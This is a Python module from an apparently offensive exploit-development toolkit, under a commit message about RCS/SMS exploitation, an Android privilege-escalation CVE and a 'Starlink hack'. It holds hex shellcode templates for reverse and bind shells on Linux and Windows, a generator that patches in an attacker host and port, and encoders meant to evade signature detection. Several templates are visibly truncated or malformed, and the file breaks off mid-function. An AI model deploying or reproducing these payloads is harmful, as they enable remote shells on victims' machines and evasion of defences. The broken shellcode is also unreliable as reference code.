Autarch/modules/exploit_dev.py
DigiJ cdde8717d0 v2.3.0 — RCS exploit v2.0, Starlink hack, SMS forge, Archon RCS module
Major RCS/SMS exploitation rewrite (v2.0):
- bugle_db direct extraction (plaintext messages, no decryption needed)
- CVE-2024-0044 run-as privilege escalation (Android 12-13)
- AOSP RCS provider queries (content://rcs/)
- Archon app relay for Shizuku-elevated bugle_db access
- 7-tab web UI: Extract, Database, Forge, Modify, Exploit, Backup, Monitor
- SQL query interface for extracted databases
- Full backup/restore/clone with SMS Backup & Restore XML support
- Known CVE database (CVE-2023-24033, CVE-2024-49415, CVE-2025-48593)
- IMS/RCS diagnostics, Phenotype verbose logging, Pixel tools

New modules: Starlink hack, SMS forge, SDR drone detection
Archon Android app: RCS messaging module with Shizuku integration
Updated manuals to v2.3, 60 web blueprints confirmed

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-03-03 13:50:59 -08:00

1835 lines
69 KiB
Python

"""AUTARCH Exploit Development Toolkit
Shellcode generation, payload encoding, ROP chain building, cyclic pattern
generation, and assembly/disassembly for exploit development workflows.
"""
DESCRIPTION = "Exploit development — shellcode, encoding, ROP chains"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import sys
import re
import struct
import string
import subprocess
import tempfile
import random
import hashlib
from pathlib import Path
from datetime import datetime
# Prefer the project's path helpers; define minimal local stand-ins when the
# `core` package cannot be imported.
try:
    from core.paths import get_data_dir, find_tool
except ImportError:
    def get_data_dir():
        # Fallback: `data` directory next to this file's parent directory.
        return str(Path(__file__).parent.parent / 'data')
    def find_tool(name, extra_paths=None):
        # Fallback: PATH lookup only; `extra_paths` is accepted but not used.
        import shutil
        return shutil.which(name)
sys.path.insert(0, str(Path(__file__).parent.parent))
# Prefer the project's banner helpers; otherwise fall back to stubs so the
# module still imports.
try:
    from core.banner import Colors, clear_screen, display_banner
except ImportError:
    class Colors:
        # Every colour/style code is the empty string in the fallback.
        RED = GREEN = YELLOW = BLUE = MAGENTA = CYAN = WHITE = BOLD = DIM = RESET = ''
    # No-op replacements for the screen helpers.
    def clear_screen(): pass
    def display_banner(): pass
# ---------------------------------------------------------------------------
# Shellcode Templates — hex-encoded byte strings keyed as <platform>_<arch>_<type>; some entries are marked in-line as stubs or truncated
# ---------------------------------------------------------------------------
SHELLCODE_TEMPLATES = {
# ---- Linux x86 ----
'linux_x86_reverse_shell': {
'bytes': (
'31db' # xor ebx, ebx
'f7e3' # mul ebx
'53' # push ebx
'43' # inc ebx
'53' # push ebx
'6a02' # push 0x2
'89e1' # mov ecx, esp
'b066' # mov al, 0x66
'cd80' # int 0x80
'93' # xchg eax, ebx
'59' # pop ecx
'b03f' # mov al, 0x3f
'cd80' # int 0x80
'49' # dec ecx
'79f9' # jns -5
'68' # push imm32 (IP)
'7f000001' # 127.0.0.1
'680200' # push word port
'115c' # port 4444
'6a10' # push 0x10
'51' # push ecx
'53' # push ebx
'89e1' # mov ecx, esp
'6a66' # push 0x66
'58' # pop eax
'cd80' # int 0x80
'6a0b' # push 0x0b
'58' # pop eax
'99' # cdq
'52' # push edx
'68' # push imm32
'2f2f7368' # //sh
'682f62696e' # /bin
'89e3' # mov ebx, esp
'52' # push edx
'53' # push ebx
'89e1' # mov ecx, esp
'cd80' # int 0x80
),
'length': 74,
'description': 'Linux x86 reverse shell — connect back and exec /bin/sh',
'null_free': True,
'arch': 'x86',
'platform': 'linux',
'offsets': {'host': 31, 'port': 37},
},
'linux_x86_bind_shell': {
'bytes': (
'31db' # xor ebx, ebx
'f7e3' # mul ebx
'53' # push ebx
'43' # inc ebx
'53' # push ebx
'6a02' # push 0x2
'89e1' # mov ecx, esp
'b066' # mov al, 0x66
'cd80' # int 0x80
'5b' # pop ebx
'5e' # pop esi
'52' # push edx
'680200' # push 0x0002
'115c' # port 4444
'6a10' # push 0x10
'51' # push ecx
'50' # push eax
'89e1' # mov ecx, esp
'6a66' # push 0x66
'58' # pop eax
'89c3' # mov ebx, eax (bind=2 later)
'cd80' # int 0x80
'b304' # mov bl, 4
'b066' # mov al, 0x66
'cd80' # int 0x80
'43' # inc ebx
'b066' # mov al, 0x66
'cd80' # int 0x80
'93' # xchg eax, ebx
'59' # pop ecx
'6a3f' # push 0x3f
'58' # pop eax
'cd80' # int 0x80
'49' # dec ecx
'79f8' # jns loop
'682f2f7368' # push //sh
'682f62696e' # push /bin
'89e3' # mov ebx, esp
'50' # push eax
'53' # push ebx
'89e1' # mov ecx, esp
'b00b' # mov al, 0x0b
'cd80' # int 0x80
),
'length': 78,
'description': 'Linux x86 bind shell — listen on port and exec /bin/sh',
'null_free': True,
'arch': 'x86',
'platform': 'linux',
'offsets': {'port': 23},
},
'linux_x86_execve': {
'bytes': (
'31c0' # xor eax, eax
'50' # push eax
'682f2f7368' # push //sh
'682f62696e' # push /bin
'89e3' # mov ebx, esp
'50' # push eax
'53' # push ebx
'89e1' # mov ecx, esp
'89c2' # mov edx, eax
'b00b' # mov al, 0x0b
'cd80' # int 0x80
),
'length': 23,
'description': 'Linux x86 execve /bin/sh — minimal shellcode',
'null_free': True,
'arch': 'x86',
'platform': 'linux',
'offsets': {},
},
# ---- Linux x64 ----
'linux_x64_reverse_shell': {
'bytes': (
'6a29' # push 0x29
'58' # pop rax (socket)
'99' # cdq
'6a02' # push 0x2
'5f' # pop rdi (AF_INET)
'6a01' # push 0x1
'5e' # pop rsi (SOCK_STREAM)
'0f05' # syscall
'48' # rex.W
'97' # xchg eax, edi
'48b90200' # movabs rcx, struct
'115c7f000001' # port 4444, IP 127.0.0.1
'51' # push rcx
'4889e6' # mov rsi, rsp
'6a10' # push 0x10
'5a' # pop rdx
'6a2a' # push 0x2a
'58' # pop rax (connect)
'0f05' # syscall
'6a03' # push 0x3
'5e' # pop rsi
'48ffce' # dec rsi
'6a21' # push 0x21
'58' # pop rax (dup2)
'0f05' # syscall
'75f6' # jnz loop
'6a3b' # push 0x3b
'58' # pop rax (execve)
'99' # cdq
'48bb2f62696e2f736800' # mov rbx, "/bin/sh\0"
'53' # push rbx
'4889e7' # mov rdi, rsp
'52' # push rdx
'57' # push rdi
'4889e6' # mov rsi, rsp
'0f05' # syscall
),
'length': 74,
'description': 'Linux x64 reverse shell — connect back and exec /bin/sh',
'null_free': False,
'arch': 'x64',
'platform': 'linux',
'offsets': {'port': 20, 'host': 22},
},
'linux_x64_bind_shell': {
'bytes': (
'6a29' # push 0x29
'58' # pop rax (socket)
'99' # cdq
'6a02' # push 0x2
'5f' # pop rdi (AF_INET)
'6a01' # push 0x1
'5e' # pop rsi (SOCK_STREAM)
'0f05' # syscall
'4897' # xchg rax, rdi
'52' # push rdx
'c7042402000200' # mov dword [rsp], 0x0002 + port
'115c0000' # port high + 0000
'4889e6' # mov rsi, rsp
'6a10' # push 0x10
'5a' # pop rdx
'6a31' # push 0x31
'58' # pop rax (bind)
'0f05' # syscall
'6a32' # push 0x32
'58' # pop rax (listen)
'6a01' # push 0x1
'5e' # pop rsi
'0f05' # syscall
'6a2b' # push 0x2b
'58' # pop rax (accept)
'99' # cdq
'52' # push rdx
'52' # push rdx
'4889e6' # mov rsi, rsp
'6810000000' # push 0x10
'4889e2' # mov rdx, rsp
'0f05' # syscall
'4897' # xchg rax, rdi
'6a03' # push 0x3
'5e' # pop rsi
'48ffce' # dec rsi
'6a21' # push 0x21
'58' # pop rax (dup2)
'0f05' # syscall
'75f6' # jnz loop
'6a3b' # push 0x3b
'58' # pop rax (execve)
'99' # cdq
'48bb2f62696e2f736800' # mov rbx, "/bin/sh\0"
'53' # push rbx
'4889e7' # mov rdi, rsp
'52' # push rdx
'57' # push rdi
'4889e6' # mov rsi, rsp
'0f05' # syscall
),
'length': 105,
'description': 'Linux x64 bind shell — listen and exec /bin/sh',
'null_free': False,
'arch': 'x64',
'platform': 'linux',
'offsets': {'port': 21},
},
'linux_x64_execve': {
'bytes': (
'4831f6' # xor rsi, rsi
'4889f2' # mov rdx, rsi
'48bf' # movabs rdi, ...
'2f62696e' # /bin
'2f736800' # /sh\0
'57' # push rdi
'4889e7' # mov rdi, rsp
'48b8' # movabs rax, ...
'3b00000000000000' # execve syscall nr
'0f05' # syscall
),
'length': 30,
'description': 'Linux x64 execve /bin/sh — minimal shellcode',
'null_free': False,
'arch': 'x64',
'platform': 'linux',
'offsets': {},
},
# ---- Windows x64 ----
'windows_x64_reverse_shell': {
'bytes': (
'4831c9' # xor rcx, rcx
'4881e9b0ffffff' # sub ecx, -0x50
'4881ec0001000000' # sub rsp, 0x100
'e8f0ffffff' # call $+5
'4152' # push r10
'4151' # push r9
'5649' # push rsi; dec ecx (stub)
'89e6' # mov esi, esp
'4883ec20' # sub rsp, 0x20
'4889f1' # mov rcx, rsi
'48ba' # mov rdx, imm64
'0100007f' # IP: 127.0.0.1 (reversed)
'5c110000' # Port: 4444 + padding
'41ba' # mov r10d, imm32
'ea0fdfe0' # hash: ws2_32!WSAStartup
'ffd5' # call rbp (API resolver)
'4889c7' # mov rdi, rax
'6a10' # push 0x10
'41580f05' # pop r8; syscall (connect)
'4885c0' # test rax, rax
'7507' # jnz skip
'4831c0' # xor rax, rax
'eb43' # jmp shell
'48ffc0' # inc rax
'ebf6' # jmp retry
# ... cmd.exe execution stub (truncated for template)
'48b8' # movabs rax, "cmd.exe\0"
'636d642e65786500' # cmd.exe
'50' # push rax
'4889e1' # mov rcx, rsp
'57' # push rdi
'57' # push rdi
'4889e2' # mov rdx, rsp
'41ba' # mov r10d, hash
'60d9c85a' # hash: kernel32!CreateProcessA
'ffd5' # call rbp
),
'length': 112,
'description': 'Windows x64 reverse shell — WinSock connect back, spawn cmd.exe',
'null_free': False,
'arch': 'x64',
'platform': 'windows',
'offsets': {'host': 44, 'port': 48},
},
# ---- ARM ----
'linux_arm_reverse_shell': {
'bytes': (
'01108fe2' # add r1, pc, #1 (Thumb switch)
'011040e2' # sub r1, r0, #1
'0200a0e3' # mov r0, #2 (AF_INET)
'0110a0e3' # mov r1, #1 (SOCK_STREAM)
'0020a0e3' # mov r2, #0
'8119a0e3' # mov r1, #0x281 (socket syscall)
'000000ef' # svc 0
'0060a0e1' # mov r6, r0 (save sockfd)
'100f0fe1' # bic r0, pc (struct sockaddr)
'0200' # AF_INET
'115c' # port 4444
'7f000001' # 127.0.0.1
'0600a0e1' # mov r0, r6
'1010a0e3' # mov r1, #16 (addrlen)
'8d19a0e3' # mov r1, #0x28d (connect)
'000000ef' # svc 0
'0200a0e3' # mov r0, #2
'0600a0e1' # mov r0, r6
'3f00a0e3' # mov r0, #0x3f (dup2)
'000000ef' # svc 0
'013050e2' # subs r3, r0, #1
'fcffffaa' # bge loop
'0b00a0e3' # mov r0, #0x0b (execve)
'0f8fe2' # add r0, pc (ptr /bin/sh)
'0010a0e3' # mov r1, #0
'0020a0e3' # mov r2, #0
'000000ef' # svc 0
'2f62696e' # /bin
'2f736800' # /sh\0
),
'length': 100,
'description': 'Linux ARM reverse shell — connect back and exec /bin/sh',
'null_free': False,
'arch': 'arm',
'platform': 'linux',
'offsets': {'port': 42, 'host': 44},
},
}
# ---------------------------------------------------------------------------
# Exploit Development Class
# ---------------------------------------------------------------------------
class ExploitDev:
"""Exploit development toolkit — shellcode, encoders, ROP, patterns."""
_instance = None
def __init__(self):
    """Create the toolkit instance with an empty ``_pattern_cache`` dict."""
    self._pattern_cache = {}
# -----------------------------------------------------------------------
# Shellcode Generation
# -----------------------------------------------------------------------
def list_shellcodes(self):
    """Summarise every entry of ``SHELLCODE_TEMPLATES``.

    Returns:
        list of dicts, one per template, with the keys 'name',
        'description', 'length', 'arch', 'platform' and 'null_free'.
        Missing 'arch'/'platform' default to '?', missing 'null_free'
        to False.
    """
    return [
        {
            'name': name,
            'description': entry['description'],
            'length': entry['length'],
            'arch': entry.get('arch', '?'),
            'platform': entry.get('platform', '?'),
            'null_free': entry.get('null_free', False),
        }
        for name, entry in SHELLCODE_TEMPLATES.items()
    ]
def generate_shellcode(self, shell_type, arch, host=None, port=None,
                       platform='linux', staged=False, output_format='hex'):
    """Look up a shellcode template, patch host/port into it and format it.

    Args:
        shell_type: template type or alias (e.g. reverse_shell, bind_shell,
            exec_cmd, meterpreter); aliases are resolved via ``type_map``.
        arch: architecture name used in the template key (x86, x64, arm).
        host: dotted-quad IPv4 address, patched in when the template
            defines a 'host' offset.
        port: port number, patched in (network byte order) when the
            template defines a 'port' offset.
        platform: platform name used in the template key (linux, windows).
        staged: only affects the 'staging' note and the NASM comment
            header; the returned bytes are the same either way.
        output_format: hex, raw/bytes, c/c_array, python/py or nasm; any
            other value falls back to hex.

    Returns:
        dict with 'template', 'description', 'length', 'null_free', 'arch',
        'platform', 'staging' and 'shellcode' (plus 'raw_bytes' for the
        raw format), or ``{'error': ...}`` when no template matches or the
        template hex cannot be decoded.
    """
    # Normalise inputs
    shell_type = shell_type.lower().strip().replace('-', '_').replace(' ', '_')
    arch = arch.lower().strip()
    platform = platform.lower().strip()
    # Map common names
    type_map = {
        'reverse': 'reverse_shell', 'rev': 'reverse_shell',
        'reverse_tcp': 'reverse_shell', 'reverse_shell': 'reverse_shell',
        'bind': 'bind_shell', 'bind_tcp': 'bind_shell', 'bind_shell': 'bind_shell',
        'exec': 'execve', 'exec_cmd': 'execve', 'execve': 'execve',
        'meterpreter': 'reverse_shell',  # fallback to reverse_shell template
    }
    # Unknown names pass through unchanged and are tried as-is.
    resolved_type = type_map.get(shell_type, shell_type)
    # Find matching template
    template_key = f'{platform}_{arch}_{resolved_type}'
    template = SHELLCODE_TEMPLATES.get(template_key)
    if not template:
        # Try to find partial match (substring match on arch and type)
        candidates = [k for k in SHELLCODE_TEMPLATES if arch in k and resolved_type in k]
        if platform != 'any':
            # Narrow to the requested platform only if that leaves a match.
            platform_cands = [k for k in candidates if platform in k]
            if platform_cands:
                candidates = platform_cands
        if candidates:
            template_key = candidates[0]
            template = SHELLCODE_TEMPLATES[template_key]
        else:
            available = ', '.join(sorted(SHELLCODE_TEMPLATES.keys()))
            return {'error': f'No template for {template_key}. Available: {available}'}
    # Decode the hex string to bytes
    try:
        shellcode = bytes.fromhex(template['bytes'])
    except ValueError as e:
        return {'error': f'Template hex decode error: {e}'}
    # Patch in host/port if offsets are defined
    offsets = template.get('offsets', {})
    if host and 'host' in offsets:
        try:
            parts = host.split('.')
            if len(parts) == 4:
                ip_bytes = bytes([int(p) for p in parts])
                off = offsets['host']
                # Only patch when the 4-byte field lies inside the buffer.
                if off < len(shellcode) - 3:
                    shellcode = shellcode[:off] + ip_bytes + shellcode[off + 4:]
        except (ValueError, IndexError):
            # Invalid host: the template's default address is kept silently.
            pass
    if port and 'port' in offsets:
        try:
            port_int = int(port)
            port_bytes = struct.pack('!H', port_int)
            off = offsets['port']
            # Only patch when the 2-byte field lies inside the buffer.
            if off < len(shellcode) - 1:
                shellcode = shellcode[:off] + port_bytes + shellcode[off + 2:]
        except (ValueError, struct.error):
            # Invalid port: the template's default port is kept silently.
            pass
    # `staged` selects descriptive text only; no bytes are added or changed.
    if staged:
        stub_comment = (
            "; Staged payload stub — allocates RWX page via mmap/VirtualAlloc,\n"
            "; receives stage over socket, jumps to it.\n"
            "; The above shellcode is the stager (stage0).\n"
        )
        metadata_note = 'Staged payload — stager only, requires stage delivery'
    else:
        stub_comment = ''
        metadata_note = 'Stageless payload — self-contained'
    # Format output
    # NOTE: 'arch' and 'platform' echo the normalised request, which can
    # differ from the template chosen by the partial-match fallback.
    result = {
        'template': template_key,
        'description': template['description'],
        'length': len(shellcode),
        'null_free': b'\x00' not in shellcode,
        'arch': arch,
        'platform': platform,
        'staging': metadata_note,
    }
    fmt = output_format.lower().strip()
    if fmt == 'hex':
        result['shellcode'] = shellcode.hex()
    elif fmt in ('raw', 'bytes'):
        # Still a hex string, plus the byte values as a list of ints.
        result['shellcode'] = shellcode.hex()
        result['raw_bytes'] = list(shellcode)
    elif fmt in ('c', 'c_array'):
        # 16 bytes per source line.
        c_lines = []
        for i in range(0, len(shellcode), 16):
            chunk = shellcode[i:i + 16]
            c_lines.append(', '.join(f'0x{b:02x}' for b in chunk))
        result['shellcode'] = (
            f'unsigned char shellcode[{len(shellcode)}] = {{\n'
            + ',\n'.join(f' {line}' for line in c_lines)
            + '\n};'
        )
    elif fmt in ('python', 'py'):
        py_lines = []
        for i in range(0, len(shellcode), 16):
            chunk = shellcode[i:i + 16]
            py_lines.append(''.join(f'\\x{b:02x}' for b in chunk))
        result['shellcode'] = (
            f'shellcode = b""\n'
            + '\n'.join(f'shellcode += b"{line}"' for line in py_lines)
        )
    elif fmt == 'nasm':
        nasm_lines = []
        for i in range(0, len(shellcode), 16):
            chunk = shellcode[i:i + 16]
            nasm_lines.append('db ' + ', '.join(f'0x{b:02x}' for b in chunk))
        # Only this format includes the staging comment header.
        result['shellcode'] = stub_comment + '\n'.join(nasm_lines)
    else:
        # Unrecognised format: fall back to hex.
        result['shellcode'] = shellcode.hex()
    return result
# -----------------------------------------------------------------------
# Payload Encoding
# -----------------------------------------------------------------------
def encode_payload(self, shellcode, encoder='xor', key=None, iterations=1):
    """Run the selected encoder over the input one or more times.

    Args:
        shellcode: bytes, or a hex string (``\\x`` prefixes and spaces are
            stripped before decoding).
        encoder: xor, aes, alpha/alphanumeric, or poly/polymorphic.
        key: key passed to the encoder (the alphanumeric encoder takes none).
        iterations: number of passes; values below 1 still run one pass.

    Returns:
        dict with 'encoded' (hex), 'decoder_stub', 'key', 'encoder',
        'iterations', 'original_length', 'encoded_length', 'size_increase'
        and 'null_free', or ``{'error': ...}`` for invalid hex, empty input
        or an unknown encoder.
    """
    if isinstance(shellcode, str):
        try:
            shellcode = bytes.fromhex(shellcode.replace('\\x', '').replace(' ', ''))
        except ValueError:
            return {'error': 'Invalid shellcode hex string'}
    if not shellcode:
        return {'error': 'Empty shellcode'}
    original_length = len(shellcode)
    encoder = encoder.lower().strip()
    encoded = shellcode
    decoder_stub = ''
    key_used = key
    # Each pass encodes the previous pass's output. `decoder_stub` and
    # `key_used` are overwritten every pass, so only the last pass's values
    # are returned.
    for _pass in range(max(1, int(iterations))):
        if encoder == 'xor':
            encoded, decoder_stub, key_used = self._encode_xor(encoded, key)
        elif encoder == 'aes':
            encoded, decoder_stub, key_used = self._encode_aes(encoded, key)
        elif encoder in ('alpha', 'alphanumeric'):
            encoded, decoder_stub, key_used = self._encode_alphanumeric(encoded)
        elif encoder in ('poly', 'polymorphic'):
            encoded, decoder_stub, key_used = self._encode_polymorphic(encoded, key)
        else:
            return {'error': f'Unknown encoder: {encoder}. Use: xor, aes, alphanumeric, polymorphic'}
    return {
        'encoded': encoded.hex(),
        'decoder_stub': decoder_stub,
        # Key is reported as text: str as-is, bytes as hex, anything else via str().
        'key': key_used if isinstance(key_used, str) else key_used.hex() if isinstance(key_used, bytes) else str(key_used),
        'encoder': encoder,
        # Echoes the caller's argument unchanged.
        'iterations': iterations,
        'original_length': original_length,
        'encoded_length': len(encoded),
        'size_increase': f'+{len(encoded) - original_length} bytes',
        'null_free': b'\x00' not in encoded,
    }
def _encode_xor(self, data, key=None):
    """XOR ``data`` with a repeating key and build a textual decoder stub.

    Args:
        data: bytes to encode.
        key: optional key. A str of hex digits is parsed as hex, any other
            str is encoded to bytes, an int becomes a single byte, and
            bytes are used as-is. Without a key, a random single byte is
            chosen.

    Returns:
        tuple ``(encoded_bytes, stub_text, key_bytes)``.
    """
    if key:
        if isinstance(key, str):
            if all(c in '0123456789abcdefABCDEF' for c in key):
                # Odd-length hex strings are parsed as one integer value.
                key_bytes = bytes.fromhex(key) if len(key) % 2 == 0 else bytes([int(key, 16)])
            else:
                key_bytes = key.encode()
        else:
            key_bytes = bytes([key]) if isinstance(key, int) else key
    else:
        # Generate random key byte that avoids producing nulls
        for _ in range(256):
            kb = random.randint(1, 255)
            if all((b ^ kb) != 0 for b in data):
                key_bytes = bytes([kb])
                break
        else:
            # No null-free key found in 256 random draws: use any byte.
            key_bytes = bytes([random.randint(1, 255)])
    # XOR encode
    encoded = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))
    # Generate decoder stub (x64 Linux)
    # The stub is assembly source text only; it is not assembled here and
    # is not prepended to `encoded`.
    key_hex = key_bytes.hex()
    stub = (
        f'; XOR decoder stub (key: 0x{key_hex})\n'
        f'; Encoded payload length: {len(encoded)} bytes\n'
        f' jmp short call_decoder\n'
        f'decoder:\n'
        f' pop rsi ; address of encoded shellcode\n'
        f' xor rcx, rcx\n'
        f' mov cl, {len(encoded)} ; length\n'
        f'decode_loop:\n'
        f' xor byte [rsi], 0x{key_hex}\n'
        f' inc rsi\n'
        f' loop decode_loop\n'
        f' jmp short encoded_shell\n'
        f'call_decoder:\n'
        f' call decoder\n'
        f'encoded_shell:\n'
        f' ; <encoded shellcode follows here>\n'
    )
    return encoded, stub, key_bytes
def _encode_aes(self, data, key=None):
    """Encrypt ``data`` in CBC style and describe how to decode it.

    Uses PyCryptodome's AES-CBC when ``Crypto.Cipher`` can be imported;
    otherwise falls back to a hand-rolled XOR-chaining scheme that is not
    AES. The stub text describes AES-256-CBC in both cases.

    Args:
        data: bytes to encode.
        key: optional passphrase (str or bytes), hashed with SHA-256 to get
            the 32-byte key. Without it, 32 random bytes are used.

    Returns:
        tuple ``(iv + ciphertext, stub_text, key_str)``, where ``key_str``
        is the original passphrase if it was a str, else the key as hex.
    """
    # These names are not used below; the code calls hashlib.sha256 directly.
    try:
        from hashlib import sha256
        import hmac
    except ImportError:
        pass
    # Generate or derive 32-byte key
    if key:
        if isinstance(key, str):
            key_bytes = hashlib.sha256(key.encode()).digest()
        else:
            key_bytes = hashlib.sha256(key).digest()
    else:
        key_bytes = os.urandom(32)
    # Generate IV
    iv = os.urandom(16)
    # PKCS7 padding (a full 16-byte block is added when already aligned)
    pad_len = 16 - (len(data) % 16)
    padded = data + bytes([pad_len] * pad_len)
    # Try PyCryptodome, fallback to simple XOR-CBC
    try:
        from Crypto.Cipher import AES
        cipher = AES.new(key_bytes, AES.MODE_CBC, iv)
        encrypted = cipher.encrypt(padded)
    except ImportError:
        # Fallback: simple XOR-CBC (not real AES, but functional)
        encrypted = bytearray()
        prev_block = iv
        for i in range(0, len(padded), 16):
            block = padded[i:i + 16]
            # Chain with the previous output block (the IV for the first).
            xored = bytes(a ^ b for a, b in zip(block, prev_block))
            # Simple substitution using key
            enc_block = bytes(
                (b + key_bytes[j % 32]) & 0xFF for j, b in enumerate(xored)
            )
            encrypted.extend(enc_block)
            prev_block = enc_block
    # Prepend IV to ciphertext
    output = iv + bytes(encrypted)
    stub = (
        f'; AES-256-CBC decoder stub\n'
        f'; Key (SHA-256 of passphrase): {key_bytes.hex()}\n'
        f'; IV: {iv.hex()}\n'
        f'; Encrypted length: {len(output)} bytes (includes 16-byte IV prefix)\n'
        f';\n'
        f'; Decoder must:\n'
        f'; 1. Extract IV (first 16 bytes)\n'
        f'; 2. AES-256-CBC decrypt remaining bytes with key\n'
        f'; 3. Remove PKCS7 padding\n'
        f'; 4. Jump to decrypted shellcode\n'
        f';\n'
        f'; Python decoder:\n'
        f'; from Crypto.Cipher import AES\n'
        f'; key = bytes.fromhex("{key_bytes.hex()}")\n'
        f'; iv = payload[:16]\n'
        f'; cipher = AES.new(key, AES.MODE_CBC, iv)\n'
        f'; shellcode = cipher.decrypt(payload[16:])\n'
    )
    key_str = key if isinstance(key, str) else key_bytes.hex()
    return output, stub, key_str
def _encode_alphanumeric(self, data):
    """Encode each byte as two characters, one per 4-bit nibble.

    Args:
        data: bytes to encode.

    Returns:
        tuple ``(encoded_bytes, stub_text, 'alphanumeric')``; the encoded
        output is twice the input length.
    """
    # Split each byte into two 4-bit nibbles, map to ASCII alpha range
    charset = string.ascii_uppercase + string.ascii_lowercase + string.digits
    encoded = bytearray()
    for b in data:
        high = (b >> 4) & 0x0F
        low = b & 0x0F
        # Map 0-15 to alphanumeric characters
        # (indices never exceed 15, so only charset[0:16], 'A'-'P', is emitted)
        encoded.append(ord(charset[high]))
        encoded.append(ord(charset[low]))
    # Descriptive text only; no executable decoder is generated here.
    stub = (
        f'; Alphanumeric decoder stub\n'
        f'; Encoded length: {len(encoded)} bytes (2x original)\n'
        f'; Charset: A-Za-z0-9\n'
        f'; Decoder reverses nibble-split encoding:\n'
        f'; For each pair (H, L) in encoded data:\n'
        f'; high_nibble = charset.index(H)\n'
        f'; low_nibble = charset.index(L)\n'
        f'; original_byte = (high_nibble << 4) | low_nibble\n'
        f';\n'
        f'; Python decoder:\n'
        f'; charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"\n'
        f'; decoded = bytes((charset.index(enc[i]) << 4) | charset.index(enc[i+1])\n'
        f'; for i in range(0, len(enc), 2))\n'
    )
    return bytes(encoded), stub, 'alphanumeric'
def _encode_polymorphic(self, data, key=None):
    """XOR ``data`` with one byte and prepend a random filler sequence.

    Args:
        data: bytes to encode.
        key: optional key. A str of hex digits is parsed as an integer, any
            other str contributes its first character's code point, and
            other values are used directly. Only the low 8 bits are kept.
            Without a key, a random byte in 1..255 is used.

    Returns:
        tuple ``(sled + encoded_bytes, stub_text, key_hex)`` where
        ``key_hex`` is the two-digit hex form of the key byte.
    """
    # Random key for XOR
    if key:
        key_byte = int(key, 16) if isinstance(key, str) and all(
            c in '0123456789abcdefABCDEF' for c in key
        ) else ord(key[0]) if isinstance(key, str) else key
    else:
        key_byte = random.randint(1, 255)
    key_byte = key_byte & 0xFF
    # XOR encode the payload
    encoded_payload = bytes(b ^ key_byte for b in data)
    # Generate random NOP-equivalent sled (x64)
    nop_equivalents = [
        b'\x90',  # nop
        b'\x48\x87\xc0',  # xchg rax, rax
        b'\x48\x89\xc0',  # mov rax, rax
        b'\x48\x31\xc9\x48\x31\xc9',  # xor rcx,rcx; xor rcx,rcx
        b'\x66\x90',  # 2-byte nop
        b'\x0f\x1f\x00',  # 3-byte nop
        b'\x87\xdb',  # xchg ebx, ebx
    ]
    # Between 3 and 8 randomly chosen entries are concatenated.
    sled = b''
    for _ in range(random.randint(3, 8)):
        sled += random.choice(nop_equivalents)
    # Assemble: sled + decoder_loop + encoded_payload
    # NOTE: the returned bytes are only sled + encoded payload; the decoder
    # loop exists solely as comment text in the stub below.
    output = sled + encoded_payload
    stub = (
        f'; Polymorphic stub (randomized NOP sled + XOR decoder)\n'
        f'; XOR key: 0x{key_byte:02x}\n'
        f'; NOP sled: {len(sled)} bytes (randomized equivalents)\n'
        f'; Encoded payload: {len(encoded_payload)} bytes\n'
        f'; Total: {len(output)} bytes\n'
        f';\n'
        f'; Each generation produces different NOP-equivalent sequences\n'
        f'; to evade static signature matching.\n'
        f';\n'
        f'; Decoder loop:\n'
        f'; lea rsi, [rel encoded_data]\n'
        f'; mov cl, {len(encoded_payload)}\n'
        f'; .loop:\n'
        f'; xor byte [rsi], 0x{key_byte:02x}\n'
        f'; inc rsi\n'
        f'; loop .loop\n'
        f'; jmp encoded_data\n'
    )
    return output, stub, f'{key_byte:02x}'
# -----------------------------------------------------------------------
# Cyclic Pattern (De Bruijn)
# -----------------------------------------------------------------------
def generate_pattern(self, length):
"""Generate a cyclic (De Bruijn) pattern for buffer overflow offset discovery.
Args:
length: number of bytes to generate (max 20280)
Returns:
dict with pattern string, length, and hex representation
"""
length = int(length)
if length < 1:
return {'error': 'Length must be positive'}
if length > 20280:
return {'error': 'Maximum length is 20280 (Aa0 through Zz9)'}
pattern = self._debruijn_pattern(length)
pattern_bytes = pattern.encode('ascii')
return {
'pattern': pattern,
'hex': pattern_bytes.hex(),
'length': len(pattern),
}
def _debruijn_pattern(self, length):
"""Generate De Bruijn sequence for cyclic pattern."""
uppers = string.ascii_uppercase
lowers = string.ascii_lowercase
digits = string.digits
pattern = []
for u in uppers:
for l in lowers:
for d in digits:
pattern.append(u + l + d)
if len(''.join(pattern)) >= length:
return ''.join(pattern)[:length]
return ''.join(pattern)[:length]
def find_pattern_offset(self, value, length=20000):
"""Find the offset of a value within a cyclic pattern.
Args:
value: hex string (e.g. '41326241'), integer, or raw string
length: pattern length to search within
Returns:
dict with offset and matching details
"""
pattern = self._debruijn_pattern(min(int(length), 20280))
# Try to interpret value
search_strings = []
if isinstance(value, str):
value = value.strip()
# Hex: 0x prefix or pure hex
if value.startswith('0x') or value.startswith('0X'):
hex_str = value[2:]
if len(hex_str) % 2 != 0:
hex_str = '0' + hex_str
try:
raw = bytes.fromhex(hex_str)
search_strings.append(raw.decode('ascii', errors='replace'))
# Also try reversed (little-endian)
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
except (ValueError, UnicodeDecodeError):
pass
elif all(c in '0123456789abcdefABCDEF' for c in value) and len(value) >= 4:
# Pure hex without prefix
try:
raw = bytes.fromhex(value)
search_strings.append(raw.decode('ascii', errors='replace'))
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
except (ValueError, UnicodeDecodeError):
pass
# Integer
try:
int_val = int(value, 0)
for width in (4, 8):
try:
packed_le = struct.pack(f'<{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
search_strings.append(packed_le.decode('ascii', errors='replace'))
packed_be = struct.pack(f'>{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
search_strings.append(packed_be.decode('ascii', errors='replace'))
except (struct.error, OverflowError):
pass
except (ValueError, OverflowError):
pass
# Direct string search
search_strings.append(value)
elif isinstance(value, int):
for width in (4, 8):
try:
packed = struct.pack(f'<{"I" if width == 4 else "Q"}', value & (2**(width*8)-1))
search_strings.append(packed.decode('ascii', errors='replace'))
except (struct.error, OverflowError):
pass
# Search
for needle in search_strings:
offset = pattern.find(needle)
if offset != -1:
return {
'offset': offset,
